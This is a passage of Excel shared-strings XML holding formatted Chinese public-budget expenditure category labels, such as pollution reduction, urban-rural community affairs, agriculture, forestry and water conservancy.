      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>污染减排</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>生态环境监测与信息</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>生态环境执法监察</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>减排专项支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>清洁生产专项支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>其他污染减排支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>可再生能源</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>可再生能源</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>循环经济</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>循环经济</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>能源管理事务</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>能源科技装备</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>能源行业管理</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>能源管理</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>农村电网建设</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>其他能源管理事务支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>其他节能环保支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>其他节能环保支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>城乡社区支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>城乡社区管理事务</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>城管执法</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>工程建设标准规范编制与监管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>工程建设管理</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>市政公用行业市场监管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>住宅建设与房地产市场监管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>执业资格注册、资质审查</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>其他城乡社区管理事务支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>城乡社区规划与管理</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>城乡社区规划与管理</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>城乡社区公共设施</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>小城镇基础设施建设</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>其他城乡社区公共设施支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>城乡社区环境卫生</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>城乡社区环境卫生</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>建设市场管理与监督</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>建设市场管理与监督</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>其他城乡社区支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>其他城乡社区支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>农林水支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>农业农村</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>农垦运行</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>科技转化与推广服务</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>病虫害控制</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>农产品质量安全</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>执法监管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>统计监测与信息服务</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>行业业务管理</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>对外交流与合作</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>防灾救灾</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>稳定农民收入补贴</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>农业结构调整补贴</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>农业生产发展</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>农村合作经济</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>农产品加工与促销</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>农村社会事业</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>农业资源保护修复与利用</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>农村道路建设</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>渔业发展</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>对高校毕业生到基层任职补助</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>农田建设</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>其他农业农村支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>林业和草原</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>事业机构</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>森林资源培育</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>技术推广与转化</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>森林资源管理</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>森林生态效益补偿</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>动植物保护</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>湿地保护</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>执法与监督</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>防沙治沙</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>对外合作与交流</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>产业化管理</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>信息管理</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>林区公共支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>贷款贴息</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>林业草原防灾减灾</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>草原管理</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>其他林业和草原支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>水利</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>水利行业业务管理</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>水利工程建设</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>水利工程运行与维护</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>长江黄河等流域管理</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>水利前期工作</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>水利执法监督</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>水土保持</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>水资源节约管理与保护</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>水质监测</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>水文测报</t>
    </r>
  </si>
